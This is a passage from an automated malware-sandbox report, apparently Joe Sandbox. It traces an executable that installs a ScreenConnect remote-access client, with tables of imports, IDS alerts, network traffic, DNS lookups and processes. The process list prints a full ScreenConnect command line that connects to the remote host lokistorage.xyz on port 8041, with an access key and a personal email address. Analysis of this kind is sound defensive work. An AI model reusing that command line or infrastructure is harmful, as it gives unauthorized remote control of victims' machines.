KERNEL32.dll	GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll	VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T18:40:29.296821+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.6	49775	TCP
2024-11-12T18:41:06.957976+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.6	49801	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:40:18.214548111 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:18.220057011 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:18.220190048 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:19.941950083 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:19.946794987 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:20.211508989 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:20.276869059 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:20.281742096 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:20.541460991 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:20.541605949 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:20.541666985 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:24.378657103 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:24.378695011 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:40:24.383724928 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:24.383735895 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:24.383795023 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:24.384676933 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:40:24.385344028 CET	8041	49723	95.164.16.15	192.168.2.6
Nov 12, 2024 18:41:24.391097069 CET	49723	8041	192.168.2.6	95.164.16.15
Nov 12, 2024 18:41:24.615722895 CET	8041	49723	95.164.16.15	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:40:18.109328032 CET	65379	53	192.168.2.6	1.1.1.1
Nov 12, 2024 18:40:18.149705887 CET	53	65379	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 18:40:18.109328032 CET	192.168.2.6	1.1.1.1	0xb671	Standard query (0)	lokistorage.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 18:40:18.149705887 CET	1.1.1.1	192.168.2.6	0xb671	No error (0)	lokistorage.xyz		95.164.16.15	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:40:11
Start date:	12/11/2024
Path:	C:\Users\user\Desktop\lat0Kwfbuj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lat0Kwfbuj.exe"
Imagebase:	0xb00000
File size:	5'639'944 bytes
MD5 hash:	51F8A6E0438EE3B616C5768326A30EDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2222155530.0000000005600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2207287516.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	12:40:12
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
Imagebase:	0xbc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	12:40:12
Start date:	12/11/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7d5b40000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	12:40:13
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD C
Imagebase:	0xbc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	12:40:13
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Imagebase:	0xe60000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	12:40:15
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200
Imagebase:	0xbc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	12:40:16
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000
Imagebase:	0xbc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	12:40:16
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c="
Imagebase:	0x290000
File size:	95'520 bytes
MD5 hash:	826314610D9E854477B08666330940B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	9
Start time:	12:40:17
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User"
Imagebase:	0x4f0000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	10
Start time:	12:40:22
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System"
Imagebase:	0xcd0000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true